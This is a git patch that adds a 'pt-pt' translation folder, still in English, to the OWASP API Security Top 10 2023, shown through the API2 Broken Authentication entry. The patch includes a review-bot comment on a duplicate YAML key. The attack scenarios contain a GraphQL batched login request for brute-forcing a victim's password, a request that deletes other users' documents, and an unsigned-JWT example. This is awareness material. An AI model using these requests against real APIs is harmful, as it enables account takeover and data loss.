From a13881a6d491d9fc6fca3880af0a76a44fbc36dd Mon Sep 17 00:00:00 2001 
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 16 Dec 2023 22:33:55 +0000 Subject: [PATCH 01/64] Adding pt-pt folder to 2023 edition --- editions/2023/mkdocs.yml | 3 + editions/2023/pt-pt/0x00-header.md | 14 ++ editions/2023/pt-pt/0x00-notice.md | 14 ++ editions/2023/pt-pt/0x00-toc.md | 23 +++ editions/2023/pt-pt/0x01-about-owasp.md | 59 ++++++ editions/2023/pt-pt/0x02-foreword.md | 43 +++++ editions/2023/pt-pt/0x03-introduction.md | 61 ++++++ editions/2023/pt-pt/0x04-release-notes.md | 47 +++++ .../2023/pt-pt/0x10-api-security-risks.md | 47 +++++ editions/2023/pt-pt/0x11-t10.md | 28 +++ .../0xa1-broken-object-level-authorization.md | 108 +++++++++++ .../2023/pt-pt/0xa2-broken-authentication.md | 134 ++++++++++++++ ...ken-object-property-level-authorization.md | 151 +++++++++++++++ .../0xa4-unrestricted-resource-consumption.md | 173 ++++++++++++++++++ ...xa5-broken-function-level-authorization.md | 100 ++++++++++ ...cted-access-to-sensitive-business-flows.md | 107 +++++++++++ .../pt-pt/0xa7-server-side-request-forgery.md | 161 ++++++++++++++++ .../pt-pt/0xa8-security-misconfiguration.md | 130 +++++++++++++ .../0xa9-improper-inventory-management.md | 105 +++++++++++ .../pt-pt/0xaa-unsafe-consumption-of-apis.md | 108 +++++++++++ editions/2023/pt-pt/0xb0-next-devs.md | 38 ++++ editions/2023/pt-pt/0xb1-next-devsecops.md | 29 +++ editions/2023/pt-pt/0xd0-about-data.md | 73 ++++++++ editions/2023/pt-pt/0xd1-acknowledgments.md | 13 ++ editions/2023/pt-pt/images/cover.jpg | Bin 0 -> 123390 bytes editions/2023/pt-pt/images/front-cc.png | Bin 0 -> 5584 bytes editions/2023/pt-pt/images/front-wasp.png | Bin 0 -> 302829 bytes editions/2023/pt-pt/images/license.png | Bin 0 -> 14003 bytes editions/2023/pt-pt/images/owasp-logo.png | Bin 0 -> 11091 bytes 29 files changed, 1769 insertions(+) create mode 100644 editions/2023/pt-pt/0x00-header.md create mode 100644 editions/2023/pt-pt/0x00-notice.md create mode 100644 editions/2023/pt-pt/0x00-toc.md create 
mode 100644 editions/2023/pt-pt/0x01-about-owasp.md create mode 100644 editions/2023/pt-pt/0x02-foreword.md create mode 100644 editions/2023/pt-pt/0x03-introduction.md create mode 100644 editions/2023/pt-pt/0x04-release-notes.md create mode 100644 editions/2023/pt-pt/0x10-api-security-risks.md create mode 100644 editions/2023/pt-pt/0x11-t10.md create mode 100644 editions/2023/pt-pt/0xa1-broken-object-level-authorization.md create mode 100644 editions/2023/pt-pt/0xa2-broken-authentication.md create mode 100644 editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md create mode 100644 editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md create mode 100644 editions/2023/pt-pt/0xa5-broken-function-level-authorization.md create mode 100644 editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md create mode 100644 editions/2023/pt-pt/0xa7-server-side-request-forgery.md create mode 100644 editions/2023/pt-pt/0xa8-security-misconfiguration.md create mode 100644 editions/2023/pt-pt/0xa9-improper-inventory-management.md create mode 100644 editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md create mode 100644 editions/2023/pt-pt/0xb0-next-devs.md create mode 100644 editions/2023/pt-pt/0xb1-next-devsecops.md create mode 100644 editions/2023/pt-pt/0xd0-about-data.md create mode 100644 editions/2023/pt-pt/0xd1-acknowledgments.md create mode 100644 editions/2023/pt-pt/images/cover.jpg create mode 100644 editions/2023/pt-pt/images/front-cc.png create mode 100644 editions/2023/pt-pt/images/front-wasp.png create mode 100644 editions/2023/pt-pt/images/license.png create mode 100644 editions/2023/pt-pt/images/owasp-logo.png
diff --git a/editions/2023/mkdocs.yml b/editions/2023/mkdocs.yml
index 98a46f03a..4f9537dc8 100644
--- a/editions/2023/mkdocs.yml
+++ b/editions/2023/mkdocs.yml
@@ -5,3 +5,6 @@ extra:
 alternate:
 - name: English
 lang: en
+ alternate:
+ - name: Portugês (Portugal)
+ lang: pt-pt
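Review bot: The added `alternate:` key appears to repeat the `alternate:` key that already sits under `extra:` in the context lines; indentation is not recoverable in this view, so the nesting is inferred. A YAML mapping cannot carry the same key twice: loaders either reject the file or keep only the last value, which would silently drop the English entry from the language list. Append the new item to the existing list instead of opening a second key, i.e. keep one `alternate:` and add `- name: Português (Portugal)` with `lang: pt-pt` beneath the English entry. That also corrects the `Portugês` spelling in the display name.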
diff --git a/editions/2023/pt-pt/0x00-header.md b/editions/2023/pt-pt/0x00-header.md
new file mode 100644
index 000000000..d3936a8b2
--- /dev/null
+++ b/editions/2023/pt-pt/0x00-header.md
@@ -0,0 +1,14 @@
+---
+title: ''
+description: OWASP API Security Top 10 2023 edition
+---
+
+![OWASP LOGO](images/cover.jpg)
+
+| | | |
+| - | - | - |
+| https://owasp.org | This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License][1] | ![Creative Commons License Logo](images/front-cc.png) |
+
+[1]: http://creativecommons.org/licenses/by-sa/4.0/
+
+
diff --git a/editions/2023/pt-pt/0x00-notice.md b/editions/2023/pt-pt/0x00-notice.md
new file mode 100644
index 000000000..c40368695
--- /dev/null
+++ b/editions/2023/pt-pt/0x00-notice.md
@@ -0,0 +1,14 @@
+# Notice
+
+This is the text version of OWASP API Security Top 10, used as source for any
+official versions of this document such the web site.
+
+Contributions to the project such as comments, corrections, or translations
+should be done here. For details on [How To Contribute][1], please refer to
+[CONTRIBUTING.md][1].
+
+* Erez Yallon
+* Inon Shkedy
+* Paulo Silva
+
+[1]: ../../../CONTRIBUTING.md
diff --git a/editions/2023/pt-pt/0x00-toc.md b/editions/2023/pt-pt/0x00-toc.md
new file mode 100644
index 000000000..ca93bd5ba
--- /dev/null
+++ b/editions/2023/pt-pt/0x00-toc.md
@@ -0,0 +1,23 @@
+# Table of Contents
+
+* [Table of Contents](0x00-toc.md)
+* [About OWASP](0x01-about-owasp.md)
+* [Foreword](0x02-foreword.md)
+* [Introduction](0x03-introduction.md)
+* [Release Notes](0x04-release-notes.md)
+* [API Security Risks](0x10-api-security-risks.md)
+* [OWASP Top 10 API Security Risks – 2023](0x11-t10.md)
+* [API1:2023 Broken Object Level Authorization](0xa1-broken-object-level-authorization.md)
+* [API2:2023 Broken Authentication](0xa2-broken-authentication.md)
+* [API3:2023 Broken Object Property Level Authorization](0xa3-broken-object-property-level-authorization.md)
+* [API4:2023 Unrestricted Resource Consumption](0xa4-unrestricted-resource-consumption.md)
+* [API5:2023 Broken Function Level Authorization](0xa5-broken-function-level-authorization.md)
+* [API6:2023 Unrestricted Access to Sensitive Business Flows](0xa6-unrestricted-access-to-sensitive-business-flows.md)
+* [API7:2023 Server Side Request Forgery](0xa7-server-side-request-forgery.md)
+* [API8:2023 Security Misconfiguration](0xa8-security-misconfiguration.md)
+* [API9:2023 Improper Inventory Management](0xa9-improper-inventory-management.md)
+* [API10:2023 Unsafe Consumption of APIs](0xaa-unsafe-consumption-of-apis.md)
+* [What's Next For Developers](0xb0-next-devs.md)
+* [What's Next For DevSecOps](0xb1-next-devsecops.md)
+* [Methodology and Data](0xd0-about-data.md)
+* [Acknowledgments](0xd1-acknowledgments.md)
diff --git a/editions/2023/pt-pt/0x01-about-owasp.md b/editions/2023/pt-pt/0x01-about-owasp.md
new file mode 100644
index 000000000..1a7e05126
--- /dev/null
+++ b/editions/2023/pt-pt/0x01-about-owasp.md
@@ -0,0 +1,59 @@
+# About OWASP
+
+The Open Worldwide Application Security Project (OWASP) is an open community
+dedicated to enabling organizations to develop, purchase, and maintain
+applications and APIs that can be trusted.
+
+At OWASP, you'll find free and open:
+
+* Application security tools and standards.
+* Complete books on application security testing, secure code development, and
+ secure code review.
+* Presentations and [videos][1].
+* [Cheat sheets][2] on many common topics.
+* Standard security controls and libraries.
+* [Local chapters worldwide][3].
+* Cutting edge research.
+* Extensive [conferences worldwide][4].
+* [Mailing lists][5] ([archive][6]).
+
+Learn more at: [https://www.owasp.org][7].
+
+All OWASP tools, documents, videos, presentations, and chapters are free and
+open to anyone interested in improving application security.
+
+We advocate approaching application security as a people, process, and
+technology problem, because the most effective approaches to application
+security require improvements in these areas.
+
+OWASP is a new kind of organization. Our freedom from commercial pressures
+allows us to provide unbiased, practical, and cost-effective information about
+application security.
+
+OWASP is not affiliated with any technology company, although we support the
+informed use of commercial security technology. OWASP produces many types of
+materials in a collaborative, transparent, and open way.
+
+The OWASP Foundation is the non-profit entity that ensures the project's
+long-term success. Almost everyone associated with OWASP is a volunteer,
+including the OWASP board, chapter leaders, project leaders, and project
+members. We support innovative security research with grants and infrastructure.
+
+Come join us!
+
+## Copyright and License
+
+![license](images/license.png)
+
+Copyright © 2003-2023 The OWASP Foundation. This document is released under the
+[Creative Commons Attribution Share-Alike 4.0 license][8]. For any reuse or
+distribution, you must make it clear to others the license terms of this work.
+
+[1]: https://www.youtube.com/user/OWASPGLOBAL
+[2]: https://cheatsheetseries.owasp.org/
+[3]: https://owasp.org/chapters/
+[4]: https://owasp.org/events/
+[5]: https://groups.google.com/a/owasp.org/forum/#!overview
+[6]: https://lists.owasp.org/mailman/listinfo
+[7]: https://www.owasp.org
+[8]: http://creativecommons.org/licenses/by-sa/4.0/
diff --git a/editions/2023/pt-pt/0x02-foreword.md b/editions/2023/pt-pt/0x02-foreword.md
new file mode 100644
index 000000000..944acfc82
--- /dev/null
+++ b/editions/2023/pt-pt/0x02-foreword.md
@@ -0,0 +1,43 @@
+# Foreword
+
+A foundational element of innovation in today's app-driven world is the
+Application Programming Interface (API). From banks, retail, and transportation
+to IoT, autonomous vehicles, and smart cities, APIs are a critical part of
+modern mobile, SaaS, and web applications and can be found in customer-facing,
+partner-facing, and internal applications.
+
+By nature, APIs expose application logic and sensitive data such as Personally
+Identifiable Information (PII) and because of this, APIs have increasingly
+become a target for attackers. Without secure APIs, rapid innovation would be
+impossible.
+
+Although a broader web application security risks Top 10 still makes sense, due
+to their particular nature, an API-specific security risks list is required.
+API security focuses on strategies and solutions to understand and mitigate the
+unique vulnerabilities and security risks associated with APIs.
+
+If you're familiar with the [OWASP Top 10 Project][1], then you'll notice the
+similarities between both documents: they are intended for readability and
+adoption. If you're new to the OWASP Top 10 series, you may be better off
+reading the [API Security Risks][2] and [Methodology and Data][3] sections
+before jumping into the Top 10 list.
+
+You can contribute to OWASP API Security Top 10 with your questions, comments,
+and ideas at our GitHub project repository:
+
+* https://owasp.org/www-project-api-security/
+* https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md
+
+You can find the OWASP API Security Top 10 here:
+
+* https://owasp.org/www-project-api-security/
+* https://github.com/OWASP/API-Security
+
+We wish to thank all the contributors who made this project possible with their
+effort and contributions. They are all listed in the [Acknowledgments
+section][4]. Thank you!
+
+[1]: https://owasp.org/www-project-top-ten/
+[2]: ./0x10-api-security-risks.md
+[3]: ./0xd0-about-data.md
+[4]: ./0xd1-acknowledgments.md
diff --git a/editions/2023/pt-pt/0x03-introduction.md b/editions/2023/pt-pt/0x03-introduction.md
new file mode 100644
index 000000000..752492b1f
--- /dev/null
+++ b/editions/2023/pt-pt/0x03-introduction.md
@@ -0,0 +1,61 @@
+# Introduction
+
+## Welcome to the OWASP API Security Top 10 - 2023!
+
+Welcome to the second edition of the OWASP API Security Top 10!
+
+This awareness document was first published back in 2019. Since then, the API
+Security industry has flourished and become more mature. We strongly believe
+this work has positively contributed to it, due to it being quickly adopted as
+an industry reference.
+
+APIs play a very important role in modern application architecture. But since
+innovation has a different pace than creating security awareness, we believe
+it's important to focus on creating awareness for common API security
+weaknesses.
+
+The primary goal of the OWASP API Security Top 10 is to educate those involved
+in API development and maintenance, for example, developers, designers,
+architects, managers, or organizations. You can know more about the API Security
+Project visiting [the project page][1].
+
+If you're not familiar with the OWASP top 10 series, we recommend checking at
+least the following top 10 projects:
+
+* [OWASP Cloud-Native Application Security Top 10][2]
+* [OWASP Desktop App Security Top 10][3]
+* [OWASP Docker Top 10][4]
+* [OWASP Low-Code/No-Code Top 10][5]
+* [OWASP Machine Learning Security Top Ten][6]
+* [OWASP Mobile Top 10][7]
+* [OWASP TOP 10][8]
+* [OWASP Top 10 CI/CD Security Risks][9]
+* [OWASP Top 10 Client-Side Security Risks][10]
+* [OWASP Top 10 Privacy Risks][11]
+* [OWASP Serverless Top 10][12]
+
+None of the projects replaces another: if you're working on a mobile application
+powered by a back-end API, you're better off reading both the corresponding top
+10's. The same is valid if you're working on a web or desktop application
+powered by APIs.
+
+In the [Methodology and Data][13] section, you can read more about how this
+edition was created. For now, we encourage everyone to contribute with
+questions, comments, and ideas at our [GitHub repository][14] or
+[Mailing list][15].
+
+[1]: https://owasp.org/www-project-api-security/
+[2]: https://owasp.org/www-project-cloud-native-application-security-top-10/
+[3]: https://owasp.org/www-project-desktop-app-security-top-10/
+[4]: https://owasp.org/www-project-docker-top-10/
+[5]: https://owasp.org/www-project-top-10-low-code-no-code-security-risks/
+[6]: https://owasp.org/www-project-machine-learning-security-top-10/
+[7]: https://owasp.org/www-project-mobile-top-10/
+[8]: https://owasp.org/www-project-top-ten/
+[9]: https://owasp.org/www-project-top-10-ci-cd-security-risks/
+[10]: https://owasp.org/www-project-top-10-client-side-security-risks/
+[11]: https://owasp.org/www-project-top-10-privacy-risks/
+[12]: https://owasp.org/www-project-serverless-top-10/
+[13]: ./0xd0-about-data.md
+[14]: https://github.com/OWASP/API-Security
+[15]: https://groups.google.com/a/owasp.org/forum/#!forum/api-security-project
diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md
new file mode 100644
index 000000000..bff6dc01c
--- /dev/null
+++ b/editions/2023/pt-pt/0x04-release-notes.md
@@ -0,0 +1,47 @@
+# Release Notes
+
+This is the second edition of the OWASP API Security Top 10 edition, exactly
+four years after its first release. A lot has changed in the API (security)
+scene. API traffic increased at a fast pace, some API protocols gained a lot
+more traction, many new API security vendors/solutions have popped up, and, of
+course, attackers have developed new skills and techniques to compromise
+APIs. It was about time to get the list of the ten most critical API security
+risks updated.
+
+With a more mature API security industry, for the first time, there was [a
+public call for data][1]. Unfortunately, no data was contributed, but based on
+the project's team experience, careful API security specialist review, and
+community feedback on the release candidate, we built this new list. In the
+[Methodology and Data section][2], you'll find more details about how this
+version was built. For more details about the security risks please refer to the
+[API Security Risks section][3].
+
+The OWASP API Security Top 10 2023 is a forward-looking awareness document for
+a fast pace industry. It does not replace other TOP 10's. In this edition:
+
+* We've combined Excessive Data Exposure and Mass Assignment focusing on the
+ common root cause: object property level authorization validation failures.
+* We've put more emphasis on resource consumption, over focusing on the pace
+ they are exhausted.
+* We've created a new category "Unrestricted Access to Sensitive Business Flows"
+ to address new threats, including most of those that can be mitigated using
+ rate limiting.
+* We added "Unsafe Consumption of APIs" to address something we've started
+ seeing: attackers have started looking for a target's integrated services to
+ compromise those, instead of hitting the APIs of their target directly. This
+ is the right time to start creating awareness about this increasing risk.
+
+APIs play an increasingly important role in modern microservices architecture,
+Single Page Applications (SPAs), mobile apps, IoT, etc. The OWASP API Security
+Top 10 is a required effort to create awareness about modern API security
+issues.
+
+This update was only possible due to the great effort of several volunteers,
+listed in the [Acknowledgments][4] section.
+
+Thank you!
+
+[1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/
+[2]: ./0xd0-about-data.md
+[3]: ./0x10-api-security-risks.md
+[4]: ./0xd1-acknowledgments.md
diff --git a/editions/2023/pt-pt/0x10-api-security-risks.md b/editions/2023/pt-pt/0x10-api-security-risks.md
new file mode 100644
index 000000000..c9d284b14
--- /dev/null
+++ b/editions/2023/pt-pt/0x10-api-security-risks.md
@@ -0,0 +1,47 @@
+# API Security Risks
+
+The [OWASP Risk Rating Methodology][1] was used to do the risk analysis.
+
+The table below summarizes the terminology associated with the risk score.
+
+| Threat Agents | Exploitability | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impacts |
+| :-: | :-: | :-: | :-: | :-: | :-: |
+| API Specific | Easy: **3** | Widespread **3** | Easy **3** | Severe **3** | Business Specific |
+| API Specific | Average: **2** | Common **2** | Average **2** | Moderate **2** | Business Specific |
+| API Specific | Difficult: **1** | Difficult **1** | Difficult **1** | Minor **1** | Business Specific |
+
+**Note**: This approach does not take the likelihood of the threat agent into
+account. Nor does it account for any of the various technical details associated
+with your particular application. Any of these factors could significantly
+affect the overall likelihood of an attacker finding and exploiting a particular
+vulnerability. This rating does not take into account the actual impact on your
+business. Your organization will have to decide how much security risk from
+applications and APIs the organization is willing to accept given your culture,
+industry, and regulatory environment. The purpose of the OWASP API Security Top
+10 is not to do this risk analysis for you. Since this edition is not
+data-driven, prevalence results from a consensus among the team members.
+
+## References
+
+### OWASP
+
+* [OWASP Risk Rating Methodology][1]
+* [Article on Threat/Risk Modeling][2]
+
+### External
+
+* [ISO 31000: Risk Management Std][3]
+* [ISO 27001: ISMS][4]
+* [NIST Cyber Framework (US)][5]
+* [ASD Strategic Mitigations (AU)][6]
+* [NIST CVSS 3.0][7]
+* [Microsoft Threat Modeling Tool][8]
+
+[1]: https://owasp.org/www-project-risk-assessment-framework/
+[2]: https://owasp.org/www-community/Threat_Modeling
+[3]: https://www.iso.org/iso-31000-risk-management.html
+[4]: https://www.iso.org/isoiec-27001-information-security.html
+[5]: https://www.nist.gov/cyberframework
+[6]: https://www.asd.gov.au/infosec/mitigationstrategies.htm
+[7]: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
+[8]: https://www.microsoft.com/en-us/download/details.aspx?id=49168
diff --git a/editions/2023/pt-pt/0x11-t10.md b/editions/2023/pt-pt/0x11-t10.md
new file mode 100644
index 000000000..230cc8c72
--- /dev/null
+++ b/editions/2023/pt-pt/0x11-t10.md
@@ -0,0 +1,28 @@
+# OWASP Top 10 API Security Risks – 2023
+
+| Risk | Description |
+| ---- | ----------- |
+| [API1:2023 - Broken Object Level Authorization][api1] | APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user. |
+| [API2:2023 - Broken Authentication][api2] | Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising a system's ability to identify the client/user, compromises API security overall. |
+| [API3:2023 - Broken Object Property Level Authorization][api3] | This category combines [API3:2019 Excessive Data Exposure][1] and [API6:2019 - Mass Assignment][2], focusing on the root cause: the lack of or improper authorization validation at the object property level. This leads to information exposure or manipulation by unauthorized parties. |
+| [API4:2023 - Unrestricted Resource Consumption][api4] | Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Other resources such as emails/SMS/phone calls or biometrics validation are made available by service providers via API integrations, and paid for per request. Successful attacks can lead to Denial of Service or an increase of operational costs. |
+| [API5:2023 - Broken Function Level Authorization][api5] | Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers can gain access to other users’ resources and/or administrative functions. |
+| [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | APIs vulnerable to this risk expose a business flow - such as buying a ticket, or posting a comment - without compensating for how the functionality could harm the business if used excessively in an automated manner. This doesn't necessarily come from implementation bugs. |
+| [API7:2023 - Server Side Request Forgery][api7] | Server-Side Request Forgery (SSRF) flaws can occur when an API is fetching a remote resource without validating the user-supplied URI. This enables an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall or a VPN. |
+| [API8:2023 - Security Misconfiguration][api8] | APIs and the systems supporting them typically contain complex configurations, meant to make the APIs more customizable. Software and DevOps engineers can miss these configurations, or don't follow security best practices when it comes to configuration, opening the door for different types of attacks. |
+| [API9:2023 - Improper Inventory Management][api9] | APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints. |
+| [API10:2023 - Unsafe Consumption of APIs][api10] | Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards. In order to compromise APIs, attackers go after integrated third-party services instead of trying to compromise the target API directly. |
+
+[1]: https://owasp.org/API-Security/editions/2019/en/0xa3-excessive-data-exposure/
+[2]: https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/
+[3]: https://owasp.org/API-Security/editions/2019/en/0xa4-lack-of-resources-and-rate-limiting/
+[api1]: 0xa1-broken-object-level-authorization.md
+[api2]: 0xa2-broken-authentication.md
+[api3]: 0xa3-broken-object-property-level-authorization.md
+[api4]: 0xa4-unrestricted-resource-consumption.md
+[api5]: 0xa5-broken-function-level-authorization.md
+[api6]: 0xa6-unrestricted-access-to-sensitive-business-flows.md
+[api7]: 0xa7-server-side-request-forgery.md
+[api8]: 0xa8-security-misconfiguration.md
+[api9]: 0xa9-improper-inventory-management.md
+[api10]: 0xaa-unsafe-consumption-of-apis.md
diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md
new file mode 100644
index 000000000..be629d9c8
--- /dev/null
+++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md
@@ -0,0 +1,108 @@
+# API1:2023 Broken Object Level Authorization
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Moderate** : Business Specific |
+| Attackers can exploit API endpoints that are vulnerable to broken object-level authorization by manipulating the ID of an object that is sent within the request. Object IDs can be anything from sequential integers, UUIDs, or generic strings. Regardless of the data type, they are easy to identify in the request target (path or query string parameters), request headers, or even as part of the request payload. | This issue is extremely common in API-based applications because the server component usually does not fully track the client’s state, and instead, relies more on parameters like object IDs, that are sent from the client to decide which objects to access. The server response is usually enough to understand whether the request was successful. | Unauthorized access to other users’ objects can result in data disclosure to unauthorized parties, data loss, or data manipulation. Under certain circumstances, unauthorized access to objects can also lead to full account takeover. |
+
+## Is the API Vulnerable?
+
+Object level authorization is an access control mechanism that is usually
+implemented at the code level to validate that a user can only access the
+objects that they should have permissions to access.
+
+Every API endpoint that receives an ID of an object, and performs any action
+on the object, should implement object-level authorization checks. The checks
+should validate that the logged-in user has permissions to perform the
+requested action on the requested object.
+
+Failures in this mechanism typically lead to unauthorized information
+disclosure, modification, or destruction of all data.
+
+Comparing the user ID of the current session (e.g. by extracting it from the
+JWT token) with the vulnerable ID parameter isn't a sufficient solution to
+solve Broken Object Level Authorization (BOLA). This approach could address
+only a small subset of cases.
+
+In the case of BOLA, it's by design that the user will have access to the
+vulnerable API endpoint/function. The violation happens at the object level,
+by manipulating the ID. If an attacker manages to access an API
+endpoint/function they should not have access to - this is a case of [Broken
+Function Level Authorization][5] (BFLA) rather than BOLA.
+
+## Example Attack Scenarios
+
+### Scenario #1
+
+An e-commerce platform for online stores (shops) provides a listing page with
+the revenue charts for their hosted shops. Inspecting the browser requests, an
+attacker can identify the API endpoints used as a data source for those charts
+and their pattern: `/shops/{shopName}/revenue_data.json`. Using another API
+endpoint, the attacker can get the list of all hosted shop names. With a
+simple script to manipulate the names in the list, replacing `{shopName}` in
+the URL, the attacker gains access to the sales data of thousands of e-commerce
+stores.
+
+### Scenario #2
+
+An automobile manufacturer has enabled remote control of its vehicles via a
+mobile API for communication with the driver's mobile phone. The API enables
+the driver to remotely start and stop the engine and lock and unlock the doors.
+As part of this flow, the user sends the Vehicle Identification Number (VIN) to
+the API.
+The API fails to validate that the VIN represents a vehicle that belongs to the
+logged in user, which leads to a BOLA vulnerability. An attacker can access
+vehicles that don't belong to him.
+
+### Scenario #3
+
+An online document storage service allows users to view, edit, store and delete
+their documents. When a user's document is deleted, a GraphQL mutation with the
+document ID is sent to the API.
+
+```
+POST /graphql
+{
+ "operationName":"deleteReports",
+ "variables":{
+ "reportKeys":[""]
+ },
+ "query":"mutation deleteReports($siteId: ID!, $reportKeys: [String]!) {
+ {
+ deleteReports(reportKeys: $reportKeys)
+ }
+ }"
+}
+```
+
+Since the document with the given ID is deleted without any further permission
+checks, a user may be able to delete another user's document.
+
+## How To Prevent
+
+* Implement a proper authorization mechanism that relies on the user policies
+ and hierarchy.
+* Use the authorization mechanism to check if the logged-in user has access to
+ perform the requested action on the record in every function that uses an
+ input from the client to access a record in the database.
+* Prefer the use of random and unpredictable values as GUIDs for records' IDs.
+* Write tests to evaluate the vulnerability of the authorization mechanism. Do
+ not deploy changes that make the tests fail.
+
+## References
+
+### OWASP
+
+* [Authorization Cheat Sheet][1]
+* [Authorization Testing Automation Cheat Sheet][2]
+
+### External
+
+* [CWE-285: Improper Authorization][3]
+* [CWE-639: Authorization Bypass Through User-Controlled Key][4]
+
+[1]: https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html
+[2]: https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html
+[3]: https://cwe.mitre.org/data/definitions/285.html
+[4]: https://cwe.mitre.org/data/definitions/639.html
+[5]: ./0xa5-broken-function-level-authorization.md
diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md
new file mode 100644
index 000000000..a02822f90
--- /dev/null
+++ b/editions/2023/pt-pt/0xa2-broken-authentication.md
@@ -0,0 +1,134 @@
+# API2:2023 Broken Authentication
+
+| Threat agents/Attack vectors | Security Weakness | Impacts |
+| - | - | - |
+| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific |
+| The authentication mechanism is an easy target for attackers since it's exposed to everyone. Although more advanced technical skills may be required to exploit some authentication issues, exploitation tools are generally available. | Software and security engineers’ misconceptions regarding authentication boundaries and inherent implementation complexity make authentication issues prevalent. Methodologies of detecting broken authentication are available and easy to create. | Attackers can gain complete control of other users’ accounts in the system, read their personal data, and perform sensitive actions on their behalf. Systems are unlikely to be able to distinguish attackers’ actions from legitimate user ones. |
+
+## Is the API Vulnerable?
+
+Authentication endpoints and flows are assets that need to be protected.
+Additionally, "Forgot password / reset password" should be treated the same way
+as authentication mechanisms.
+
+An API is vulnerable if it:
+
+* Permits credential stuffing where the attacker uses brute force with a list
+  of valid usernames and passwords.
+* Permits attackers to perform a brute force attack on the same user account,
+  without presenting captcha/account lockout mechanism.
+* Permits weak passwords.
+* Sends sensitive authentication details, such as auth tokens and passwords in
+  the URL.
+* Allows users to change their email address, current password, or do any other
+  sensitive operations without asking for password confirmation.
+* Doesn't validate the authenticity of tokens.
+* Accepts unsigned/weakly signed JWT tokens (`{"alg":"none"}`)
+* Doesn't validate the JWT expiration date.
+* Uses plain text, non-encrypted, or weakly hashed passwords.
+* Uses weak encryption keys.
+
+On top of that, a microservice is vulnerable if:
+
+* Other microservices can access it without authentication
+* Uses weak or predictable tokens to enforce authentication
+
+## Example Attack Scenarios
+
+## Scenario #1
+
+In order to perform user authentication the client has to issue an API request
+like the one below with the user credentials:
+
+```
+POST /graphql
+{
+  "query":"mutation {
+    login (username:\"\",password:\"\") {
+      token
+    }
+  }"
+}
+```
+
+If credentials are valid, then an auth token is returned which should be
+provided in subsequent requests to identify the user. Login attempts are
+subject to restrictive rate limiting: only three requests are allowed per
+minute.
+
+To brute force log in with a victim's account, bad actors leverage GraphQL
+query batching to bypass the request rate limiting, speeding up the attack:
+
+```
+POST /graphql
+[
+  {"query":"mutation{login(username:\"victim\",password:\"password\"){token}}"},
+  {"query":"mutation{login(username:\"victim\",password:\"123456\"){token}}"},
+  {"query":"mutation{login(username:\"victim\",password:\"qwerty\"){token}}"},
+  ...
+  {"query":"mutation{login(username:\"victim\",password:\"123\"){token}}"},
+]
+```
+
+## Scenario #2
+
+In order to update the email address associated with a user's account, clients
+should issue an API request like the one below:
+
+```
+PUT /account
+Authorization: Bearer
+
+{ "email": "" }
+```
+
+Because the API does not require users to confirm their identity by providing
+their current password, bad actors able to put themselves in a position to
+steal the auth token might be able to take over the victim's account by starting
+the reset password workflow after updating the email address of the victim's
+account.
+
+## How To Prevent
+
+* Make sure you know all the possible flows to authenticate to the API
+  (mobile/ web/deep links that implement one-click authentication/etc.). Ask
+  your engineers what flows you missed.
+* Read about your authentication mechanisms. Make sure you understand what and
+  how they are used. OAuth is not authentication, and neither are API keys.
+* Don't reinvent the wheel in authentication, token generation, or password
+  storage. Use the standards.
+* Credential recovery/forgot password endpoints should be treated as login
+  endpoints in terms of brute force, rate limiting, and lockout protections.
+* Require re-authentication for sensitive operations (e.g. changing the account
+  owner email address/2FA phone number).
+* Use the [OWASP Authentication Cheatsheet][1].
+* Where possible, implement multi-factor authentication.
+* Implement anti-brute force mechanisms to mitigate credential stuffing,
+  dictionary attacks, and brute force attacks on your authentication endpoints.
+  This mechanism should be stricter than the regular rate limiting mechanisms
+  on your APIs.
+* Implement [account lockout][2]/captcha mechanisms to prevent brute force
+  attacks against specific users. Implement weak-password checks.
+* API keys should not be used for user authentication. They should only be used
+  for [API clients][3] authentication.
+
+## References
+
+### OWASP
+
+* [Authentication Cheat Sheet][1]
+* [Key Management Cheat Sheet][4]
+* [Credential Stuffing][5]
+
+### External
+
+* [CWE-204: Observable Response Discrepancy][6]
+* [CWE-307: Improper Restriction of Excessive Authentication Attempts][7]
+
+[1]: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
+[2]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism(OTG-AUTHN-003)
+[3]: https://cloud.google.com/endpoints/docs/openapi/when-why-api-key
